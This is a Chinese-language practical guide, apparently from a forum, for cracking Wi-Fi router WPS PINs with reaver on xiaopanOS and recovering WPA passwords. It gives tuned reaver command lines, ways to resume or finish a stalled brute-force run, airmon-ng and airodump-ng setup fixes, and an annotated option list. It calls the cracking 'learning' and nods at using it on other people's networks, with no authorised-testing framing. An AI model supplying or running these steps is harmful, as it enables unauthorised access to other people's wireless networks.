（非TP-LINK路由推薦–d9 –t9參數(shù)防止路由僵死

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv）

小結(jié)-學(xué)習(xí)時應(yīng)因狀況調(diào)整參數(shù)（-c后面都已目標(biāo)頻道為1作為例子）

目標(biāo)信號非常好: ?reaver ?-i ?mon0 ?-b MAC ?-a ?-S ?-vv ?-d0 ?-c 1

目標(biāo)信號普通: ?reaver ?-i ?mon0 ?-b MAC ?-a ?-S ?-vv ?-d2 ?-t 5 ?-c 1

目標(biāo)信號一般: ?reaver ?-i ?mon0 ?-b MAC ?-a ?-S ?-vv ?-d 5 ?-c 1

?

參數(shù)一：-a -n -N -x 20 -r 100:10 -| 60 -t 2 -v d 0 (我默認(rèn)使用這個)

參數(shù)二：-a –v –N –x20–r100:10 l300 –t12 –d0 （如想多等會，可將–t12修改為–t15等）

參數(shù)三：-a –v –S –x20–r100:10 l300 –t12 –d0 ?（如重碼多且速度太快，可將–d0修改為–d2）等）

參數(shù)四：-a –v –N –x20–r100:10 l300 –t12 –d0 –S（其他參數(shù)也可試一下，不要加-n）

?

xiaopanOS中reaver參數(shù)

-a -v -S -x 20 -r 100:10 -l 300

?

光盤啟動、u盤/硬盤啟動保存學(xué)習(xí)進度的方法

reaver1.3的保存路徑：打開桌面最后邊一個圖標(biāo)xfec 定位到/etc/reaver下，有一個wpc后綴的文件，名字是你學(xué)習(xí)的目標(biāo)的mac地址，復(fù)制到你的U盤，路徑是/mnt/sdb1（一般是這個，自己找找，要是沒有東西就右鍵mount），以后重啟到xiaopanOS，把這文件復(fù)制到原來的路徑，再試試，可以載入進度了！o(∩_∩)o 哈哈

reaver1.4的保存路徑：保存目錄：/usr/local/etc/reaver如果xfe文件管理器未獲得ROOT權(quán)限。請先運行root shell后輸入xfe即可獲得root權(quán)限。保存方法同上。下次重啟動后，再手工復(fù)制到/etc/reaver/ 目錄下即可

MAC地址.wpc 其實是個文本文件，格式與破密用字典酷似，其第一行和第二行，分別是4位數(shù)和3位數(shù)的指示位置數(shù)（+4）。

------------------------------------------------------------------------------

如果進度到99.9%后，AP死機，可打開它，總共1000個3位數(shù)，找出剩余的十幾個PIN碼，用QSS、WPS客戶端軟件,手動測試、破密。如果是跑了99.99%死機, ?意味嗎？ ?你懂的吧？ 最后一個PIN就是。

以下這個命令是指定PIN碼，獲得WPA 密碼PSK

reaver -i mon0 -b MAC -p PIN8位數(shù)

如果上述措施不后，仍不見PSK密碼，可能因軟件原因，漏碼了！需要重新跑后三位數(shù)！

（前四位正確的話）reaver -i mon0 -b MAC -p PIN前4位數(shù)

?

1.遇見8187驅(qū)動RF-kill的 ?xiaopanos

對8187的網(wǎng)卡支持不是太好，有時會出現(xiàn)驅(qū)動加載不了，就是輸入第一條命令后出現(xiàn)operation not possible due to RF-kill，我想大部分人也遇到過把。新版本0.34使用命令rfkill unblock all解決這個問題，容易出現(xiàn)問題的是0.3.2版本的。

第一種嘗試的解決辦法：這時候就斷開USB，等上大概10幾秒把再插上，連續(xù)插拔幾次總有一次會好。

第二種嘗試的解決辦法：先運行一下奶瓶掃描一會，然后退出奶瓶。 虛擬機 USB圖標(biāo)（USB圖標(biāo)上的小點）由深綠變成淺綠色，變淺綠就輸入

ifconfig wlan0 up

airmon-ng start wlan0

第三種解決辦法：出現(xiàn)錯誤后的解決

a.Root Shell窗口敲擊命令“ifconfig -a”，查看最后一項是否出現(xiàn)wlan0，這個就是你的無

線網(wǎng)卡。如果沒有出現(xiàn)拔插網(wǎng)卡，直到測試出現(xiàn)wlan0。

b.接下來輸入第二條命令“ifconfig wlan0 up”,接下來第三條“airmon-ng start wlan0”載入

網(wǎng)卡。如果出現(xiàn)operation not possible due to RF-kill，不要驚慌繼續(xù)輸入命令“airmon-ng start

wlan0”多輸入幾次，然后拔出USB網(wǎng)卡，再插入，重復(fù)第2步的命令。一般情況下就會

正常載入了括號內(nèi)只會顯示monitor mode enabled on mon0，不會出現(xiàn)operation not possible

due to RF-kill，如果不行以上步驟再次重復(fù)，直到解決。

c.輸入“airodump-ng mon0”（如果括號內(nèi)顯示的是monitor mode enabled on mon1，相應(yīng)的

命令就改為airodump-ng mon1，其他的類似），測試一下，要是可以正常掃描，說明8187L加載成功，就可以reaver了，你懂的！

?

reaver參數(shù)說明

?

必須參數(shù)

-i, --interface=<wlan> Name of the monitor-mode interface to use 網(wǎng)卡的監(jiān)視接口，通常是mon0

-b, --bssid=<mac> BSSID of the target AP

AP的MAC地址

Optional Arguments: 可選參數(shù)

-m, --mac=<mac> MAC of the host system

指定本機MAC地址

-e, --essid=<ssid> ESSID of the target AP

路由器的ESSID，一般不用指定

-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) 信號的頻道，如果不指定會自動掃描 -o, --out-file=<file> Send output to a log file [stdout]

輸出日志文件

-s, --session=<file> Restore a previous session file

恢復(fù)進度文件

-C, --exec=<command> Execute the supplied command upon successful pin recovery pin成功后執(zhí)行命令

-D, --daemonize Daemonize reaver

設(shè)置reaver成Daemon

-a, --auto Auto detect the best advanced options for the target AP 對目標(biāo)AP自動檢測高級參數(shù)

-f, --fixed Disable channel hopping

禁止頻道跳轉(zhuǎn)

-5, --5ghz Use 5GHz 802.11 channels

使用5G頻道

-v, --verbose Display non-critical warnings (-vv for more) 顯示不重要警告信息 -vv 可以顯示更多 -q, --quiet Only display critical messages

只顯示關(guān)鍵信息

-h, --help Show help

顯示幫助

Advanced Options:高級選項

-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin 使用指定的4位或者8位pin碼 -d, --delay=<seconds> Set the delay between pin attempts [1] pin間延時，默認(rèn)1秒

-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts

[60]

AP鎖定WPS后等待時間

-g, --max-attempts=<num> Quit after num pin attempts

最大pin次數(shù)

1/2

-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures

[0]

10次意外失敗后等待時間，默認(rèn)0秒 -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts 每x次pin后等待y秒

-t, --timeout=<seconds> Set the receive timeout period [5] 收包超時，默認(rèn)5秒

-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] M5/M7超時，默認(rèn)0.2秒

-A, --no-associate Do not associate with the AP (association must be done by another application)

不連入AP（連入過程必須有其他程序完成） -N, --no-nacks Do not send NACK messages when out of order packets are received

不發(fā)送NACK信息（如果一直pin不動，可以嘗試這個參數(shù)）

-S, --dh-small Use small DH keys to improve crack speed 使用小DH關(guān)鍵值提高速度（推薦使用） -L, --ignore-locks Ignore locked state reported by the target AP 忽略目標(biāo)AP報告的鎖定狀態(tài)

-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet 每當(dāng)收到EAP失敗包就終止WPS進程 -n, --nack Target AP always sends a NACK [Auto] 對目標(biāo)AP總是發(fā)送NACK，默認(rèn)自動 -w, --win7 Mimic a Windows 7 registrar [False] 模擬win7注冊，默認(rèn)關(guān)閉

Ps：影響到無線的因素很多，所以各參數(shù)之間的配合很重要，當(dāng)然，最關(guān)鍵的還是取決于信號。

reaver使用相關(guān)